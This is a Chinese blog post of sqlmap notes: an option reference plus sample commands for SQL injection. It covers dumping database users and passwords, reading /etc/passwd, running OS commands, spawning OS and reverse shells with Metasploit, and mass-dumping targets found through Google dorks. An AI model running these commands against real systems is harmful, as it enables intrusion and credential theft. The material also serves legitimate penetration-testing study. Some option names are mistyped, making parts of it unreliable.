sqlmap使用笔记

最新推荐文章于 2023-07-16 23:13:53 发布
最新推荐文章于 2023-07-16 23:13:53 发布
阅读量303 收藏 3
点赞数
分类专栏: 学习归纳 文章标签: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/84191356
版权 
-u  #注入点
 -f  #指纹判别数据库类型
 -b  #获取数据库版本信息
 -p  #指定可测试的参数(?page=1&id=2 -p "page,id")
 -D"" #指定数据库名
 -T"" #指定表名
 -C"" #指定字段
 -s"" #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s "xx.log"恢复:-s "xx.log" -resume)
 --level=(1-5)   #要执行的测试水平等级,默认为 1
 --risk=(0-3)    #测试执行的风险等级,默认为 1
 --time-sec=(2,5)   #延迟响应,默认为 5
 --data    #通过 POST 发送数据
 --columns   #列出字段 --current-user   #获取当前用户名称
 --current-db   #获取当前数据库名称
 --users    #列数据库所有用户
 --passwords   #数据库用户所有密码
 --privileges   #查看用户权限(--privileges -U root)
 -U    #指定数据库用户
 --dbs    #列出所有数据库 --tables -D""   #列出指定数据库中的表
 --columns -T"user"-D"mysql" #列出 mysql 数据库中的 user 表的所有字段
 --dump-al   #列出所有数据库所有表
 --exclude-sysdbs  #只列出用户自己新建的数据库和表
 --dump -T""-D""- C""  #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)
 --dump -T""-D""--start 2 --top4  #列出指定数据库的表的 2-4 字段的数据
 --dbms    #指定数据库 (MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft 
Access,SQLite,Firebird,Sybase,SAP MaxDB)
 --os    #指定系统(Linux,Windows)
 **-v    #详细的等级(0-6)**

 0. 只显示 Python 的回溯,错误和关键消息
 1. 显示信息和警告消息
 2. 显示调试消息
 3. 有效载荷注入
 4. 显示 HTTP 请求
 5. 显示 HTTP 响应头
 6. 显示 HTTP 响应页面的内容
 
 --privileges    #查看权限
 --is-dba    #是否是数据库管理员
 --roles    #枚举数据库用户角色
 --udf-inject    #导入用户自定义函数(获取系统权限)
 --union-check    #是否支持 union 注入
 --union-cols   #union  查询表记录
 --union-test   #union 语句测试
 --union-use    #采用 union 注入
 --union-tech orderby  #union 配合 order by 
--data""    #POST 方式提交数据(--data "page=1&id=2")
 --cookie"用;号分开"  #cookie 注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
 --referer""   #使用 referer 欺骗(--referer "http://www.baidu.com")
 --user-agent""   #自定义 user-agent
 --proxy"http://127.0.0.1:8118" #代理注入
 --string=""   #指定关键词,字符串匹配.
 --threads   #采用多线程(--threads 3)
 --sql-shell   #执行指定 sql 命令
 --sql-query   # 执 行 指 定 的 sql 语 句 (--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" )
 --file-read   #读取指定文件
 --file-write   #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本 地的 test.txt 文件写入到目标的 1.txt)
 --file-dest   #要写入的文件绝对路径
 --os-cmd=id   #执行系统命令
 --os-shell   #系统交互 shell
 --os-pwn   #反弹 shell(--os-pwn --msf-path=/opt/framework/msf3/)
 --msf-path=   #matesploit 绝对路径(--msf-path=/opt/framework/msf3/)
 --os-smbrelay    #
 --os-bof    #
 --reg-read   #读取 win 系统注册表
 --priv-esc   #
 --time-sec=   #延迟设置 默认 --time-sec=5  为 5 秒
 -p"user-agent"--user-agent"sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指 user-agent 注入
 --eta    #盲注 
 
 /pentest/database/sqlmap/txt/ common-columns.txt
 字段字典 common-outputs.txt
 common-tables.txt 表字典
 keywords.txt
 oracle-default-passwords.txt
 user-agents.txt
 wordlist.txt

实例语句

sqlmap -u "URL"  --current-user    #获取当前用户名称
 sqlmap -u "URL"  --current-db      #获取当前数据库名称
 sqlmap -u "URL"  --tables  -D "db_name"   #列表名
 sqlmap -u "URL"  --columns -T "tablename" users-D "db_name" -v 0    #列字段
 sqlmap -u "URL"  --dump  -C "column_name"  -T "table_name" -D "db_name" -v 0    #获取字段内容
 sqlmap -u "URL"  --smart  --level 3 --users   # smart 智能 level 执行测试等级
 sqlmap -u "URL"  --dbms "Mysql" --users    # dbms 指定数据库类型
 sqlmap -u "URL"  --users      #列数据库用户 
 sqlmap -u "URL"  --dbs     #列数据库
 sqlmap -u "URL"  --passwords     #数据库用户密码
 sqlmap -u "URL"  --passwords-U root  -v 0   #列出指定用户数据库密码 
 sqlmap -u "URL"  --dump -C "password,user,id" -T "tablename" -D "db_name"--start 1 --stop 20  #列出指定 字段,列出 20 条
 sqlmap -u "URL"  --dump-all -v 0    #列出所有数据库所有表 
 sqlmap -u "URL"  --privileges     #查看权限
 sqlmap -u "URL"  --privileges -U root    #查看指定用户权限 
 sqlmap -u "URL"  --is-dba -v 1     #是否是数据库管理员 
 sqlmap -u "URL"  --roles     #枚举数据库用户角色
 sqlmap -u "URL"  --udf-inject     #导入用户自定义函数(获取系统权限!)
 sqlmap -u "URL"  --dump-all --exclude-sysdbs -v 0  #列出当前库所有表 
 sqlmap -u "URL"  --union-cols     #union 查询表记录
 sqlmap -u "URL"  --cookie "COOKIE_VALUE"  #cookie 注入 
 sqlmap -u "URL"  -b      #获取 banner 信息
 sqlmap -u "URL"  --data "id=3"     #post 注入 
 sqlmap -u "URL"  -v 1 -f     #指纹判别数据库类型
 sqlmap -u "URL"  --proxy"http://127.0.0.1:8118"  #代理注入
 sqlmap -u "URL"  --string"STRING_ON_TRUE_PAGE" #指定关键词 
 sqlmap -u "URL"  --sql-shell     #执行指定 sql 命令
 sqlmap -u "URL"  --file /etc/passwd
 sqlmap -u "URL"  --os-cmd=whoami    #执行系统命令
 sqlmap -u "URL"  --os-shell     #系统交互 shell 
 sqlmap -u "URL"  --os-pwn     #反弹 shell
 sqlmap -u "URL"  --reg-read     #读取 win 系统注册表 
 sqlmap -u "URL"  --dbs-o "sqlmap.log"    #保存进度
 sqlmap -u "URL"  --dbs  -o "sqlmap.log" --resume  #恢复已保存进度
 sqlmap -g "google 语法"   --dump-all --batch   #google 搜索注入点自动 跑出所有字段

攻击实例

sqlmap -u "URL&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406" -string="Surname" --dbms=mysql --users --password
Luckysec
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
frpfile官方最新绕id工具_sqlmap工具使用详解
weixin_39764487的博客
11-26 1万+
大家好,我是 Taicker,鄙人有幸被 38.5 挑衅了,这其中发生了什么感人至深的故事,我就不说了。先来讲sqlmap工具1.sqlmap是什么sqlmap是一款自动化的 sql 注入工具,闻名程度匹敌几年前的啊 D,他的功能很多,比如判断是否可以注入,发现,然后利用漏洞,里面也包含了许多绕 waf 的脚本,不过近两年都绕不了了,在 18 年的时候还勉强可以绕过。他支持许多数据库:M...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap使用
LuckySec
11-16 433
sqlmap使用: 注入类型有四种分别为: boolean-based blind、error-based、stacked queries、inline query cmd操作:python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py 后,加下面的操作 #-u 注入点 检测注入点是否可用 #曝出该sqlserver中所有数据...
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap的基本命令使用
热门推荐
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
sqlmap 的用法
weixin_43460822的博客
07-12 183
常用方法:python sqlmap.py [options] 注意:长横线表示"--"; -a, -所有的检索一切 -b,——横幅检索DBMS横幅 当前用户检索DBMS当前用户 ——current-db检索DBMS当前数据库 检索DBMS服务器主机名 -is- DBA检测DBMS当前用户是否是DBA ——users枚举DBMS用户 ——passwords 枚举DBMS用户的密码...
sqlmap使用笔记1
08-03
本篇笔记将深入探讨sqlmap使用方法和功能,涵盖多个核心知识点。 1. **数据库版本探测**: 使用`-b`选项可以获取数据库版本信息,这对于识别潜在的漏洞和制定攻击策略至关重要。例如,针对不同的数据库版本,...
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
sqlmap使用方法笔记
04-21
网络安全攻防工具 sqlmap 使用方法笔记,包括攻击实例和使用简介,是听课程做的笔记,适合初学者
sqlmap笔记.md
08-18
sqlmap笔记
SQLmap使用指南(包含使用SQLmap获取shell)
最新发布
北冥同学的成长记录笔记
07-16 4312
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令
sqlmap常用语句
崔钰玺的博客
08-14 5656
常用命令 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –resume)
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 6013
本文会主要介绍SQLMap使用,包括常用的参数,常用的语句,以及常用的功能。
渗透之——SQLMap用法总结
冰河的专栏
12-09 2410
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84929238 一、参数说明 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&amp;id=2 -p "page,id") -D "" #指定数据库名 -T "" #指定表名 -C "" #指定字段 ...
Sqlmap注入参数/shell命令参数/通用参数/杂项参数
buffedon的博客
07-24 4273
Sqlmap参数汇总2指定url位置注入设置指定注入参数设置URI注入位置设置任意注入位置注入参数指定某种注入指定表名设置DNS攻击设置二次注入探测指纹信息DBMS信息获取sqlmap暴力破解数据文件读写读文件写文件shell命令--os-shell--os-pwn(结合msf)sql-shell注册表通用参数爬虫杂项参数 指定url位置注入 设置指定注入参数 在我们的 sqli-labs-master 中的url中一般都是一个参数id。但是有的url中会有多个参数id,name等 sqlmap.py -u
Sqlmap使用教程
B-Tree
02-24 3731
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
SQLMAP 命令详解
安全苦行僧
05-30 396
SQLMAP 命令详解 Options(选项):–version 显示程序的版本号并退出-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为 1)Target(目标):以下至少需要设置其中一个选项,设置目标 URL。-d DIRECT 直接连接到数据库。-u URL, –url=URL 目标 URL。-l LIST...
PHPCMS2008源码浅析-common.inc.php PHPCMS20008二次开发
CaterPillar's IT Lifes
03-05 2045
define(PHPCMS_ROOT, str_replace("//", /, substr(dirname(__FILE__), 0, -7)));    //定义根目录define(MICROTIME_START, microtime()); //设置起始时间define(IN_PHPCMS, TRUE); //网站入口判断变量define(MAGIC_QUOTES_GPC
Python 文件 write() 方法
weixin_34234721的博客
03-05 3654
概述 Python 文件 write() 方法用于向文件中写入指定字符串。 在文件关闭前或缓冲区刷新前,字符串内容存储在缓冲区中,这时你在文件中是看不到写入的内容的。 语法 write() 方法语法如下: fileObject.write(str) 参数 str -- 要写入文件的字符串。 返回值 该方法没有返回值。 实例 文件 runoob.txt ...
使用SQLmap检测SQL注入:DVWA实战教程
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmap和DVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值